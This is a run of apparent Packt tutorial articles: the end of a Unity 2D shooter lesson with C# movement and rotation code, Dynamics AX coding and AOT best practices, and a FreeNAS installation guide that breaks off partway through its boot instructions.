// The last movement that we've made
private Vector3 lastMovement = new Vector3();

Between the variable definitions, you will notice comments that explain what each variable is and how we'll use it. To write a comment, you can simply add // to the beginning of a line, and everything after it on that line is ignored by the compiler. If you want to write something that is longer than one line, you can use /* to start a comment, and everything inside will be commented out until you write */ to close it. It's always a good idea to do this in your own coding endeavors for anything that doesn't make sense at first glance.

For those of you working on your own projects in teams, there is an additional form of commenting that Unity supports, which may make your life much nicer: XML comments. They take up more space than the comments we are using, but they also document your code for you (a brief example appears in the sketch at the end of this section). For a nice tutorial about that, check out http://unitypatterns.com/xml-comments/.

In our game, the player may want to move up using either the arrow keys or the W key. You may even want to use something else. Rather than restricting the player to just one button, we will store all the possible ways to go up, down, left, or right in their own container. To do this, we are going to use a list, which is a holder for multiple objects that we can add to or remove from while the game is being played. For more information on lists, check out http://msdn.microsoft.com/en-us/library/6sh2ey19(v=vs.110).aspx
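Both of those ideas are easy to see in a tiny, self-contained sketch. The class below is not part of PlayerBehaviour; the names and the J key used for rebinding are made up for illustration. It documents a method with XML comments and adds a key binding to a List<KeyCode> while the game is running.

using System.Collections.Generic;
using UnityEngine;

public class KeyBindingExample : MonoBehaviour
{
    // Multiple keys can drive the same direction, just as in PlayerBehaviour.
    public List<KeyCode> upButton = new List<KeyCode> { KeyCode.UpArrow, KeyCode.W };

    /// <summary>
    /// Adds an extra key for moving up, if it is not already bound.
    /// </summary>
    /// <param name="key">The key to bind to the up direction.</param>
    public void AddUpBinding(KeyCode key)
    {
        if (!upButton.Contains(key))
        {
            upButton.Add(key);
        }
    }

    void Update()
    {
        // Example: press J (an arbitrary choice) to bind a joystick button at runtime.
        if (Input.GetKeyDown(KeyCode.J))
        {
            AddUpBinding(KeyCode.Joystick1Button0);
        }
    }
}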
One of the things you'll notice is the public and private keywords before the variable types. These are access modifiers that dictate who can and cannot use these variables. The public keyword means that any other class can access that property, while private means that only this class will be able to access the variable. Here, currentSpeed is private because we don't want the current speed to be modified or set anywhere else. But you'll notice something interesting about the public variables that we've created.

Save your PlayerBehaviour script, then go back into the Unity project and drag-and-drop the PlayerBehaviour script onto the playerShip object. Not saving before switching back to Unity is a very common mistake made by people working with MonoDevelop. Have a look at the following screenshot:

You'll notice that the public variables we created are now listed in the Inspector for the component. This means that we can actually set those variables in the Inspector without having to modify the code, allowing us to tweak values very easily, which is a godsend for many game designers. You may also notice that the names have changed to be more readable. This is because of the naming convention we are using, with each word after the first starting with a capital letter; this convention is called camel case (more specifically, headlessCamelCase).

Now change the Size of each of the Button variables to 2, and fill in Element 0 with the appropriate arrow key and Element 1 with W for up, A for left, S for down, and D for right. When this is done, it should look something like the following screenshot:

Now that we have our variables set, go back to MonoDevelop to work on the script some more.

The next part of the stub code is a definition for a method called Start; it isn't a method we invented, but one that belongs to MonoBehaviour. Where variables are data, functions are the things that modify and/or use that data. Functions are self-contained modules of code (enclosed within braces, { and }) that accomplish a certain task. The nice thing about a function is that once it is written, it can be used over and over again, and functions can be called from inside other functions:

void Start () {
}

Start is only called once in the lifetime of the behavior, when the game starts, and is typically used to initialize data.

If you're used to other programming languages, you may be surprised that initialization of an object is not done using a constructor function. This is because the construction of objects is handled by the editor and does not take place at the start of gameplay as you might expect. If you attempt to define a constructor for a script component, it will interfere with the normal operation of Unity and can cause major problems with the project.

However, for this behavior, we will not need the Start function, so delete the Start function and its contents.

The next function included in the stub is the Update function. Also inherited from MonoBehaviour, this function is called for every frame that the component exists and for each object it's attached to. We want to update our player ship's rotation and movement every frame. Inside the Update function (between its { and }), put the following lines of code:

// Rotate player to face mouse
Rotation();

// Move the player's body
Movement();

Here, I called two functions, but they don't exist yet because we haven't written them.
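Before we write those two methods, it may help to see the whole script as it stands. The following is simply the pieces assembled so far, shown for orientation rather than as new code to type in; the empty Rotation and Movement bodies are placeholders that we fill in next.

using UnityEngine;
using System.Collections.Generic;

public class PlayerBehaviour : MonoBehaviour
{
    // Movement modifier applied to directional movement.
    public float playerSpeed = 2.0f;

    // What the current speed of our player is
    private float currentSpeed = 0.0f;

    // Allows us to have multiple inputs per direction (keyboard, joystick, etc.)
    public List<KeyCode> upButton;
    public List<KeyCode> downButton;
    public List<KeyCode> leftButton;
    public List<KeyCode> rightButton;

    // The last movement that we've made
    private Vector3 lastMovement = new Vector3();

    void Update()
    {
        // Rotate player to face mouse
        Rotation();

        // Move the player's body
        Movement();
    }

    // Defined in the next steps
    void Rotation() { }
    void Movement() { }
}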
Below the Update function, and before the closing brace of the class, add the following Rotation function:

// Will rotate the ship to face the mouse.
void Rotation()
{
    // We need to tell where the mouse is relative to the
    // player
    Vector3 worldPos = Input.mousePosition;
    worldPos = Camera.main.ScreenToWorldPoint(worldPos);

    /*
     * Get the differences from each axis (stands for
     * deltaX and deltaY)
     */
    float dx = this.transform.position.x - worldPos.x;
    float dy = this.transform.position.y - worldPos.y;

    // Get the angle between the two objects
    float angle = Mathf.Atan2(dy, dx) * Mathf.Rad2Deg;

    /*
     * The transform's rotation property uses a Quaternion,
     * so we need to convert the angle into a Vector
     * (the Z axis is used for rotation in 2D).
     */
    Quaternion rot = Quaternion.Euler(new Vector3(0, 0, angle + 90));

    // Assign the ship's rotation
    this.transform.rotation = rot;
}

Now, if you comment out the Movement line and run the game, you'll notice that the ship rotates to face the mouse. Have a look at the following screenshot:

Below the Rotation function, we now need to add our Movement function with the following code:

// Will move the player based off of keys pressed
void Movement()
{
    // The movement that needs to occur this frame
    Vector3 movement = new Vector3();

    // Check for input
    movement += MoveIfPressed(upButton, Vector3.up);
    movement += MoveIfPressed(downButton, Vector3.down);
    movement += MoveIfPressed(leftButton, Vector3.left);
    movement += MoveIfPressed(rightButton, Vector3.right);

    /*
     * If we pressed multiple buttons, make sure we're only
     * moving the same length.
     */
    movement.Normalize();

    // Check if we pressed anything
    if (movement.magnitude > 0)
    {
        // If we did, move in that direction
        currentSpeed = playerSpeed;
        this.transform.Translate(movement * Time.deltaTime *
                                 playerSpeed, Space.World);
        lastMovement = movement;
    }
    else
    {
        // Otherwise, move in the direction we were going
        this.transform.Translate(lastMovement * Time.deltaTime
                                 * currentSpeed, Space.World);
        // Slow down over time
        currentSpeed *= .9f;
    }
}

Inside this function, I've used another function called MoveIfPressed, so we'll need to add that as well. Below the Movement function, add the following:

/*
 * Will return the movement if any of the keys are pressed,
 * otherwise it will return (0,0,0)
 */
Vector3 MoveIfPressed(List<KeyCode> keyList, Vector3 Movement)
{
    // Check each key in our list
    foreach (KeyCode element in keyList)
    {
        if (Input.GetKey(element))
        {
            /*
             * It was pressed, so we leave the function
             * with the movement applied.
             */
            return Movement;
        }
    }

    // None of the keys were pressed, so we don't need to move
    return Vector3.zero;
}

Now, save your file and move back into Unity. Save your current scene as Chapter_1.unity by going to File | Save Scene. Make sure to save the scene to the Scenes folder we created earlier. Run the game by pressing the play button. Have a look at the following screenshot:

You'll see that we can move using the arrow keys or the W A S D keys, and our ship rotates to face the mouse. Great!

Summary

This article walked through the start of a 2D twin-stick shooter and should help you become familiar with the 2D game development features in Unity.

Resources for Article:

Further resources on this subject:

Components in Unity [article]
Customizing skin with GUISkin [article]
What's Your Input? [article]
Technical Best Practices for Dynamics AX - Shared and AOT Object Standards

Packt
23 Oct 2009
15 min read
Shared Standards Some Dynamics AX customization best practices are applicable irrespective of AOT element. These standards include X++ standards, naming conventions, label standards, and Help Text guidelines. X++ Standards This section discusses some best practices related to the X++ language. Conformance to this standard results in improved execution time, ease in upgrading and further customization, efficient use of OOP concepts, better readability of code, etc. Some general principles are as follows: Variable or constant or parameter declarations should be as local as possible to utilize memory resources in an efficient way. Error conditions should be checked in the beginning so that minimum work is done for action and rollback of action. This will also hinder denial of service attacks. Denial of service attack is an attempt to stress the system with too many garbage requests so that an authorized user is not served. The parameters supplied as value must not be modified or manipulated as it may increase the chances of using wrong values somewhere else. Code should be written in a clean fashion, which means unused variables, methods, and classes should be removed from the code. The existing MorphX functions or functionality should be used as much as possible (unless other best practices stop you from doing so), rather than creating new ones as it will make upgrading easier. The user should not experience a run-time error. All possible cases should be foreseen and handled accordingly. If some unpredicted case appears during run time, it should show an error in the Infolog with a message to help the users on how to avoid the situation and what action can be taken to prevent it. The value of the this variable should not be changed. The reusability should be maximized. E.g. rather than repeating lines of code at different places, a single method can be written so that changes in the method can be reflected at all the places where this method is used. There should be only one successful return point (except in switch statements) so that object deletion, etc. can be ensured. A method should perform a single well-defined task and be named according to the task performed. Text Constant Standards All the text used in Dynamics AX is supposed to be in a label file irrespective of its use e.g. user interface or error or success message. The use of text constants can be classified into two broad categories i.e. user interface text and system-oriented text. The text used in the user interface should follow the following best practices: Modify property values on the extended data types or base enums inthe application. Never create duplicate label files i.e. the same text (in the same language) but a different label file. New label files can be created when customizing the text, but it is always recommended to reuse the standard labels. However, it may offer a disadvantage—all the changes made to the SYS layer label files will be gone whenever an upgrade occurs. So the decision of customizing an existing label file or creating new label file should be taken carefully. User interface text (labels files) should be used in double quotes. System-oriented text constants must be in single quotes. Exception Handling The principle uses of exception handling include freeing system resources (e.g. memory through object deletion, closing database connection, etc.) and providing constructive information in the Infolog so that the user can prevent such erroneous conditions. 
The following are a few recommended best practices related to exception handling: A try or catch deadlock or retry loop should always be created around database transactions that can cause deadlocks. In the retry clause the values of transient variables should be set back to the values before try. Branching A few recommended best practices related to the if-else statement and switch statement are as follows: Always use positive logic e.g. write if (true) rather than if (! false). Prefer switch statement rather than multiple if-else statements. Always end a case with a break or return or throw statement unless a fall through mechanism is intentionally used. When a fall through mechanism is used a comment should be given like //fall through so that it is clear to every reader. Code Layout For readability of the code, code should be written in a proper layout. Some chief best practices for code layout are as follows: Remove commented code before shipping code. Follow indentation rules. Follow case rules for naming classes, methods, tables, etc. Methods Following are a few best practices for methods: Methods should be small and logical so that it can be easily overridden or over-layered. Methods should perform a single well defined task and from their name the task performed should be clear. For static class methods and table methods, qualified client, server, or client server should be used in such a way that calls to other tiers are minimized. For greater details refer to the Best Practices for Designing section in the Developer's Guide. To ensure trustworthiness, appropriate access levels (public, private, or protected) should be assigned. Methods should be named according to the Dynamics AX naming conventions; the reserved keywords such as is, check, validate, set, get, and find should be used as per the Dynamics AX way of using these standard methods or functions. All methods using such keywords must not have side effects e.g. no assignment in validate, check, get, or is methods. Parameter's names must start with an underscore (_) character besides following other generalized naming conventions. Handling Dates Dates are sources of error due to variations in date presentation formats and in values due to differences in time zone. A few best practices for handling dates are as follows: Date fields must be stored or displayed in the date field only as IntelliMorph has the ability to display the date value in a format suitable for the user provided that the date format property is chosen as Auto and it is presented in a date control. The system date should not be considered as reliable information but in some cases (e.g. validation of information input by a user) system date should be read using the SystemDateGet() function instead of the today() function. Date conversion should be avoided as it will loose date properties and hence sometimes conversion may result in wrong information. For all user interface-related situations strFmt or date2Str should be used with a value of -1 for all formatting-related parameters. This will allow users to use this information in the format specified in regional settings. Care should also be taken that string variables storing converted date information are sufficiently long. Label Standards It is highly recommended that any user-interface text is defined using labels. This will ensure many advantages during translation. 
A few label file standards to ensure the true benefits of the label file system are as follows: The location of label files should be the most generalized one i.e. extended data type (EDT). In some cases an existing EDT cannot be used only because of the difference in label text. In such cases a new EDT should be created by extending the existing EDT. In such cases other alternatives may also be available (e.g. label change at the field) but the rule of thumb is to use the label at the most general place. The label files should not be duplicated i.e. two label files should not exist for the same text. AOT Object Standards The AOT object standards are specific to a particular AOT element. Broadly we can classify AOT elements as follows: Data Dictionary Extended data type Base Enum Tables Feature keys Table collection Classes Forms Reports Jobs Menu items Data Dictionary This is a group of AOT objects including the items mentioned in the previous section. The best practices for tables can further be divided into best practices for the fields, field groups, indexes, table relations, delete actions, and methods. Extended Data Type The EDT plays a great role as it is the basic entity of GUI elements. The following are a few basic best practices related to extended data types. All date and date format-related properties should be set to Auto. Help text should not be same as the label property. Help text is supposed to be more descriptive and should be able to explain why and/or how. An EDT name must be a real-world name, prefixed with module (if it belongs to one module only). Base Enum The following are a few basic best practices related to Base Enum: The Enum name should be an indication of either the few possible values or type of values. For example DiscountType, OpenClose, etc. Display length property should be set to auto so that in every language the full name can be displayed. Help and label properties must have some value. Help and label properties should not have the same value. Tables Many of the best practices for tables come under the scope of performance optimization, database design standards, etc. and hence those standards have been discussed elsewhere. Some of the standards not discussed are discussed here. The table name may consist of the following valuable information: Prefix: Module name such as Cust for Account Payable, Sales for Account Receivables Infix: Logical description of the content Post fix: Type of data e.g. Trans (for transactions), Jour (Journals), Line (table containing detailed information about a particular record in header table), Table (primary main tables), Group, Parameters, Setup, or module name to which the table belongs Label is a mandatory property and tables must be labelled using Label ID only. The text value of Label ID must be unique in all languages supported. If a table belongs to one of the four types Parameter, Group, Main, or WorksheetHeader, then it must have an associated form to maintain the table records. This form should have a name identical to its display menu item (used to start this form) and like the table name. formRef is the property of a table for the name of the associated form. Title Field 1 and Title Field 2 should be mentioned: TitleField1: The key field for the records in the table. This should be a descriptive title, if the key is information for the user. TitleField2: The description for the records in the table. 
Fields Most of the properties for the fields are inherited from extended data types; however, it is not mandatory to use some or all inherited values for such properties. Here are a few guidelines: Name: Should be like the corresponding EDT name but if named separately, it should be logical. The fields used as key should be postfixed as ID e.g. CustId, ItemId, etc. HelpText: This is a mandatory property and inherited from the corresponding EDT. Since Help Text needs to be customized as per the different uses ofthe same EDT, Help text can be modified at any field but the following arethe guidelines: The help text property should not be same as the label property. Label is also a mandatory property, which is inherited from EDT. If a value is set here, it should be different from the value on EDT. Every field that is either the primary key or one of the key mandatory properties must be set to Yes. Before considering memo or container type fields, it should be kept in mind that they add time to application and database fetch, they inhibit array fetching, and these types of fields cannot be used in where expressions. Field Group The field group is a group of fields shown in the user interface. Dynamics AX has some standard groups (e.g. Identification, Administration, Address, Dimension, Setup, Misc, etc.), while other can be created. The fields that logically belong together can be placed in one field group while the Misc field group can be used to group fields that do not fit in any other field group. The dimension field group must have a single kind of field Dimension. The field groups should have the same kind of grouping at the database and form or reports to improve caching and hence the performance. Delete Actions The database integrity is one of the key principles in Relational Database Management System (RDBMS). The delete action should be used on every relation between two tables. The following are key best practices for delete actions. Use a delete action on every relation between two tables. Use table delete actions instead of writing code to specify whether deletes are restricted or cascaded. Dynamics AX has three types of delete actions; selection of one will solely depend upon the custom requirements. Table Methods The tables in Dynamics AX have several properties such as delete, validateDelete, etc. and hence Dynamics AX recommends that you should not write methods or X++ code to implement something that can be done just by setting property values. Dynamics AX recommends using inbuilt table methods for those custom requirements that cannot be met with table properties settings. Some of the table methods are mandatory to implement e.g. find and exists methods. Classes The classes have a peculiarity that they may have both a back end (database) and front end (GUI). The front interface should be easy to use and at the same time as secure as possible. The implementation details of the class should always be hidden from the user and hence use of private or protected methods is recommended. The back-end methods are highly secure, standardized, and reliable and hence use of private or protected methods is recommended in prescribed design patterns. The design patterns depend upon the type of class. Classes can be categorized in the following categories: Real object Action class Supporting class The following are a few common best practices related to declaration: Object member variables must only be used to hold the state of the object i.e. 
variables whose values should be kept between and outside instance method calls. Use of global variables must be minimized. Unused variables must be cleaned up; the tool available at Add-Ins | Best Practices | Check Variables can be used to find unused variables. Constants used in more than one method in a class (or in a subclass) should be declared in the class declaration. There is a rich set of best practices for classes, and the Best Practices for Microsoft Dynamics AX Development guide released by Microsoft is a good read.

Forms

Forms belong to the presentation tier of any three-tier architecture, so most of the best practices for them relate to look and feel or layout. The main characteristics they revolve around are:

Maximal use of IntelliMorph
No forced date or time format
No forced layout, such as a fixed width for labels or positioned GUI controls
Use of label files for GUI text
Minimal coding on forms

Avoid Coding on Forms

The basic concept of three-tier architecture is that forms should be used only for the presentation tier, and hence no other code, such as business logic, should be placed on forms. Code placed on forms also reduces their reusability and the ease of further customization; for example, if you want to develop an Enterprise Portal, code written on forms will have to be written again in classes or table methods, which makes the implementation complex. Another example is when you want to 'COM enable' your business logic; form code containing business logic will make that almost impossible. Any code (other than presentation logic) written on forms also limits performance, as calls between the different tiers increase and slow the system down, so code on forms should be avoided as much as possible. In cases where avoiding code on forms is not possible, the following guidelines should be used to decide where to place it:

Form level: when the code is related to the whole form, when it is related to multiple data sources, or for Edit or Display methods that are not related to any data source.
Data source: for data source-related Edit or Display methods, and for code related only to that data source which cannot be effectively placed in a table method.
Controls: only when the code is strictly related to the controls.

Use of IntelliMorph Maximally

Due to a user's locale or preferred format, a form may be presented in a different language and/or a different date, time, or currency format. Dynamics AX best practices recommend Auto as the value for the display properties related to the following: date, currency, time, language, number format (such as the decimal operator, separator, etc.), label size, and form size. The rule of thumb is to keep these properties at their Auto or default values, which helps IntelliMorph to function maximally. For further details about best practices, readers are recommended to go through the Developer's Guide for Best Practices.

Reports

The peculiarity of reports is that they are output media where the external environment, such as paper size, the user's locale or language configuration, and font size, matters. Dynamics AX recommends using 'Auto Design' to develop reports, as such reports can change their layout according to these external variables. The other way to develop a report in Dynamics AX is 'Generated Design'; this type of design is recommended only when a strict report layout is required.
A few such examples are regulatory reports, accounts reports, and so on.

Summary

In this two-part article we looked at various areas where quality can be improved by adopting best practices, the theory behind those practices, and practical tips on how to adopt them in your own customizations.
Installation of FreeNAS

Packt
28 Oct 2009
28 min read
Downloading FreeNAS Before you can install the FreeNAS server, you will need to download the latest version from the FreeNAS website (http://www.freenas.org). Go to the download section and find the latest "LiveCD" version. The LiveCD version is what is known as an ISO image file and will have the .iso file extension. An ISO image is an exact copy of the structure and data for a CD or DVD disk. Using a CD burning program, you can create a FreeNAS bootable CD. We will look at this in more detail later on. What Hardware Do I Need? In this tutorial, we will start exploring FreeNAS, so you will need a machine on which to install the FreeNAS software. At this point in time, it doesn't have to be the final machine you are going to use as the FreeNAS server. You can use a "test" machine now and having learnt all about FreeNAS, you can build, install, and deploy a production machine (or machines) later. So, what we need now is a PC with at least 96Mb of RAM (but 128Mb or more is recommended), a bootable CD-ROM drive, a network card, one or more hard disks, and either a floppy disk drive (and a blank formatted disk) or a USB flash disk (MS-DOS formatted and empty). The hard disk will be for the data that you want to store and the floppy disk or USB flash disk will be for storing the configuration information. For the installation and initialization stages, you will also need a monitor and keyboard (but not mouse) attached to the PC. You can remove the monitor later, once FreeNAS is up and running. Warning FreeNAS boots as a LiveCD, which means that it does not use the disks on the host machine during boot up. However, when you start to configure storage on the FreeNAS server (specifically, when you format drives) all the data on the disk will be LOST. Do NOT use a machine that contains important data or an operating system that you will need afterwards. Virtualization  & VMWare The average PC runs just one operating system and inside that operating system, you would run your applications like word processing and email. There is a technology (called virtualization), which allows PCs to run more than one operating system, or to be more precise, to allow a guest virtual PC to run inside your actual PC. This virtual PC is an independent software box that can run its own OS and applications as if it were a physical computer. A virtual PC behaves exactly like a physical PC and has its own virtual CPU, RAM, hard disk, and network interface card (NIC). You can install FreeNAS on a virtual PC and FreeNAS can't tell the difference between the virtual PC and any other physical machine, also, it appears on the network just as a real PC would, running FreeNAS. There are lots of virtualization products available for Windows, Linux, and Apple OS X today. You can learn more at Wikipedia http://en.wikipedia.org/wiki/Virtualization. A very popular virtualization solution is from VMWare (http://www.vmware.com). VMWare have both commercial and freeware offerings and there are pre-configured FreeNAS images available for the VMWare range of products. This makes it an ideal environment for testing the FreeNAS server. Quick Start Guide For the Impatient If you are comfortable with burning ISO images to CDs, setting your computer's BIOS to boot from CDROM, disk partitions, and TCP/IP networking then this little guide should help you get a simple version of the FreeNAS server up and running in just a few minutes. 
If, however, some of these things sound daunting, then skip this section and go on to the next one where we shall go through the installation process one step at a time. For this example, we will use a USB flash disk to store the configuration information. You can use a floppy but be careful that during the boot process, the PC doesn't try to boot from the floppy before it boots from the CDROM. Burning and Booting Once you have downloaded the ISO image file from the FreeNAS website, you need to burn it to a CD. Having done that, put the CD into the PC as well as the flash disk and switch it on. Make sure that the BIOS is set to boot from CD. If it isn't, you need to enter into the BIOS and configure it to boot from CD. On many modern PCs, it is possible to select the boot device at start-up by pressing a special key (which is often either F8 or F12) to show a boot device menu. You can then select the CD as the boot device. The boot process is in four distinct parts: First, the PC will go through its POST (Power On Self Test) sequence. Here, the PC will check the amount of memory installed (which you can often see being counted on the screen) and which devices are connected (like hard drives and CDROMs). It should then start to boot from the CD. Here, FreeBSD (the underlying OS of FreeNAS) will start to boot, this is recognizable by the simple spinning wheel (made up of simple text characters like | - / and , which are animated to give the appearance of spinning). The third step is the FreeNAS boot menu. This will appear for just a few seconds and you should just let it boot normally, which is the default. The final stage is when the FreeNAS logo appears and the system will boot as FreeNAS server. You can tell when the system is fully loaded because the PC speaker will make some short but melodious beeps. To enable access to the web interface, the network of the FreeNAS server must be configured. Press the SPACE bar on the keyboard and the FreeNAS logo will disappear and a simple text menu will appear.       There are two aspects to configuring the network, first, you need to choose which network card to use and second, you need to assign it an address. If you have only one network card in your machine, then the FreeNAS server should have found it and automatically assigned it to be the LAN (Local Area Network) interface. What If My Network Card Isn't Found?This probably means that the network card in your machine isn't supported by FreeNAS or more specifically, by FreeBSD. You will need to replace the card with one supported by FreeBSD. Check the FreeBSD hardware compatibility page for more information: http://www.freebsd.org/releases/6.2R/hardware-i386.html If you see something like this: then the network has been recognized and assigned automatically by FreeNAS. The default IPv4 address for FreeNAS is 192.168.1.250, if this is good for your network, then you can just leave it unchanged. However, if you need to change it then press 2 followed by ENTER. If you want the machine to get its address from DHCP (Dynamic Host Configuration Protocol), answer yes (y) to the IPv4 DHCP question, otherwise answer no (n). If you are not using DHCP, you can now enter the desired IP address. Next, you need to enter the subnet mask. For 255.255.255.0, enter 24, for 255.255.0.0 enter 16, and for 255.0.0.0, enter 8. At this point, you can now skip the default gateway and DNS questions (by just pressing ENTER). 
If you do want to enter a default gateway and DNS server at this point, they will usually be the IP address of your Internet router. We won't be using IPv6 so the simplest thing to do now is just answer yes to the "Do you want to use AutoConfiguration for IPv6?" question. This will cause a small delay while FreeNAS tries (and probably fails) to get the IPv6 address but it is simpler than trying to enter the IPv6 address manually! You are now ready to access the web interface. The FreeNAS web interface can be accessed from any machine on the network with a web browser (including Windows, Linux, and OS X machines). On this client machine, type the address of the FreeNAS server with http:// in front of it into your web browser. For example: http://192.168.1.250 Configuring The first time you access the FreeNAS web interface, you will be asked for the username and password. The default username is admin and the default password is freenas. You should now be in the web interface. To configure some storage space, you need to work with "Disks". The logical order of working is that disks must be added, then formatted (if need be), then mounted. Finally, access is given to the various mounted disks by configuring different system services like CIFS and FTP.     So, to add a disk, go to Disks: Management. There is a + sign in a circle on the right-hand-side of the page (it can be easy to miss first time), click on it to add a disk. On the next page, select the disk you want to add. If you click on the drop-down menu, you should see the hard disks of the machines, the CDROM, and the USB flash disk. Dis'k Names in FreeBSD'The disk naming convention in FreeBSD is:/dev/ad0: Is the IDE/ATA Primary Master /dev/ad1 : Is the IDE/ATA Primary Slave/dev/ad2 : Is the IDE/ATA Secondary Master/dev/ad3 : Is the IDE/ATA Secondary Slave/dev/acd0 : Is the first ATA CD/DVD drive detected/dev/da0: Is the first SCSI hard drive, /dev/da1 the second and so on.USB flash disks are controlled using the SCSI driver, so they will appear as /dev/daN drives as well. Make sure ad0 is selected (which it should be by default). The rest of the page you can leave alone. Click Add to add the disk to the system. You then need to click Apply in order for the changes to take effect. You will now have a table showing you the disk you have added, including its size and a description. ApplyIn FreeNAS, the majority of steps need to be applied (which saves the configuration file to disk) by clicking the Apply button. It is normally found near the top of the page before any tables or configuration information is given. If you do not apply the changes, the interface will, on the whole, remember your changes but they will not be enacted in the system. After a reboot, unapplied changes will disappear. It is possible on some pages to make multiple operations and apply them all at the end. Next, the disk needs to be formatted. In Disks: Format, select the disk ad0 (which you just added above). Leave everything else unchanged and click Format disk. The disk will then be formatted. The low level output of the format command will be displayed in a box. It should end with Done!. Now the disk needs to be mounted. Go to Disks: Mount Point. Click on the + in the circle (which I shall refer to as the "add circle" from now on). Leave the Type as Disk and select the disk ad0 again. You need to type in a name, store is as good a name as any, but feel free to use which ever descriptive name you want to. 
Be DescriptiveIn setting up and configuring your FreeNAS server, you will be called upon to invent various names for mount points and share names etc. Try to be as descriptive as you can without being long winded. Temp, scratch, blob, and even zob are OK for testing, but try more meaningful names like storeage1, storage60gb or backupstorage etc. Don't use spaces in the names, instead use underline and in general, the names should be no longer than 15 characters. Although filling-in the description isn't mandatory in the web interface, it is worth using. Once you have completed the form click Add and then apply the changes. Sharing with Windows Machines Now that the disk has been added, formatted, and mounted, it is time to share it on the network and give other users the ability to read and write to it. FreeNAS supports many different types of access protocol, for this start guide, we will only look at Microsoft's CIFS protocol that primarily allows Windows machines (but also Apple OS X and Linux machines) to access the storage. In Services: CIFS/SMB, tick the enable box (in the title of the configuration data table). At this point, you can just about leave everything else as is with the exception of the workgroup name. We will be leaving the authentication method as "Anonymous" here as this is the easiest to get working and provides unrestricted read/write access to everyone. To make sure that the Windows machines are able to find the shared storage, we need to set the workgroup name, on the FreeNAS server, to be the same as the workgroup name of the Windows PC that will access the share. The default workgroup name for Windows Vista is WORKGROUP but note that the default for Window XP Home Edition was MSHOME. Now click Save and Restart. This will save the changes you have made and restart the CIFS service. Go to the Shares tab and click on add circle. Enter a name for the share. Repeating the name of the mount point is probably the safest policy, so in this case, store and also add a comment. Then click ... in the Path section. This will bring up a simple file system browser. The files you are seeing are on the FreeNAS server and NOT on your local PC. Click store and /mnt/store/ will appear in the little edit box at the click. OK it and you will be taken back to the shares page. Now /mnt/store/ has been added as the path. Leave everything else as it is and click Add and then apply the changes. So now the first hard disk of the computer is formatted, mounted, and shared to the rest of the network. Now, we will access the share from a Windows Vista machine. Testing the Share You can perform this test from any machine that supports the CIFS protocol including Windows 95/98/ME, Windows 2000/XP, Apple OS X, and Linux. Here, we are going to use Windows Vista. Open the Network and Sharing Center by clicking Network on the Start menu. When the window appears, Vista will automatically scan the network for any shared network resources. When it has finished, you will see the available machines on the network including FREENAS.     Open up the FREENAS computer and you will see store, the storage area that you configured. Double click on that and you now "inside" the FreeNAS server from within your Windows machine. Try dragging and dropping a few files in to the store area. Then try deleting them again. To access the FreeNAS server without using the Network and Sharing Center, click Start, and type freenas and then press Enter. 
This will bring up the shares available on the FreeNAS server directly:     Detailed Overview of Installation It is time to get your hands on a working FreeNAS server and to do that, we need to boot it up onto a PC. There are several steps to this. First, you must burn a CD of the ISO image file you have downloaded. Then, you need to boot the PC from the CD; this may involve changing your computers BIOS to make it boot from the optical drive. Then, you can configure the FreeNAS server to make some storage space available on the network. When using the LiveCD to boot FreeNAS, there are two types of storage on FreeNAS: data and configuration information. The data will be held on the hard drive of the PC, but the configuration needs to be held on a floppy disk or a USB flash disk. For this example, we will use a USB flash disk to store the configuration information. Making the FreeNAS CD To boot the PC into FreeNAS, you need a CD. The ISO image file you have downloaded contains all the information needed for the CD, but it needs to be written onto a physical CD. This process is often known as burning the CD as the laser writes to the disk by heating it and marking or scorching the surface layer. You need to use a PC with a CD-RW drive and a blank CD-R disk (I recommend using a good brand name CD-R for best results). Download the FreeNAS ISO image on to that machine. The PC with the CD writer should have some CD writing software on it (for example Roxio Easy CD or Nero). If you are familiar with the CD writing software, go ahead and burn the ISO file to the CD-R disk. If you aren't familiar with the CD writing software or it doesn't have any CD writing software, then I recommend ISO Recorder. You can download it from http://isorecorder.alexfeinman.com/isorecorder.htm.     Booting from CD Put your newly made FreeNAS CD into the CD drive of the machine on which you want to install FreeNAS, and also put the USB flash disk into a USB port. The flash disk will be used to store the configuration data. (You can also use a floppy disk. If you have both a USB flash disk and a floppy inserted, FreeNAS will save the configuration on the USB device). Now, you need to switch on the PC. When a PC starts, it goes through what is known as the Power On Self Test sequence. Here, the PC will check the amount of memory installed in the PC and find the installed hard drives. After the checks, the PC will try and boot from one of the hard drives, the CDROM, the floppy disk or even a USB flash disk. Which device the PC chooses first as its boot device can be changed by a built-in setup program. The setup program lets you modify basic system configuration settings. These settings are stored in a special battery-backed area of the computer's memory that retains the settings even when the power is switched off. During the POST sequence, there is normally a message telling you how to enter into the built-in setup program. It is normally either the DEL key or F2, on some systems it is also F10. You need to enter into the setup to check and/or change the first boot device to be the CDROM so that the computer will boot into FreeNAS. Each PC has a slightly different setup program, so you will need to search around until you find what you need. The three most popular types of setup programs (also known as BIOS Basic Input Output Program) are the Phoenix setup program, the Phoenix-Award setup program, and the AMI setup program. 
There are many types of BIOS setup programs and each PC manufacturer modifies the setup program for their own use. The information below is really only a "rough guide" to help you feel your way around. Your BIOS setup program may be significantly different from the examples below. The best source of information is the manual that came with your PC or your motherboard. If you don't have one, most PC manufacturers have them available for download on their websites. Phoenix BIOS If your machine has a Phoenix BIOS, then normally you need to press F2 to enter the setup program. The top of the setup program has a menu that you can navigate with the left and right arrow keys, you need to select the Boot menu.     On the Boot menu page, you can move up and down the available boot devices using the up and down arrow keys. You can expand and collapse sections with the + or signs using the ENTER key. To change the boot order, you use the + and keys. You want to make sure that the CDROM is the first device in the list. After you have changed the boot order list, you need to go to the Exit menu (by pressing the right arrow key) and select Exit Saving Changes. The PC will then reboot and after the POST, it will start to boot from the FreeNAS CD.     Phoenix-Award BIOS If your PC has a Phoenix-Award BIOS, then normally, you need to press DEL to enter the setup program. Once inside, you can the up, down, left, and right keys to navigate around the menus. Go in to Advanced BIOS Features and set the First Boot Device to be CDROM by using the + and keys. You now need to save your changes and exit. Pressing ESC will bring you back to the main menu, then select Save & Exit Setup. Often, pressing F10 will have the same effect. The PC will then reboot and if you have made the changes correctly, it will boot from the FreeNAS CD. AMI BIOS The American Megatrends, Inc (AMI) BIOS normally displays a message telling you to Hit <DEL> if you want to run setup. Once inside, it is quite different to that of the setup programs for Phoenix or Award. Here, the Tab key is used to navigate and the arrow keys are used to change values. To go from one page to the next, press the ALT+P keys. This information should also be printed at the bottom of the BIOS setup page. You need to find the variable Boot Sequence and make sure that it is set to boot from the CDROM first. First Look at FreeNAS The boot process is in 4 distinct parts. First, the PC will go through its POST (Power On Self Test) sequence. Here, the PC will check the amount of memory installed (which you can 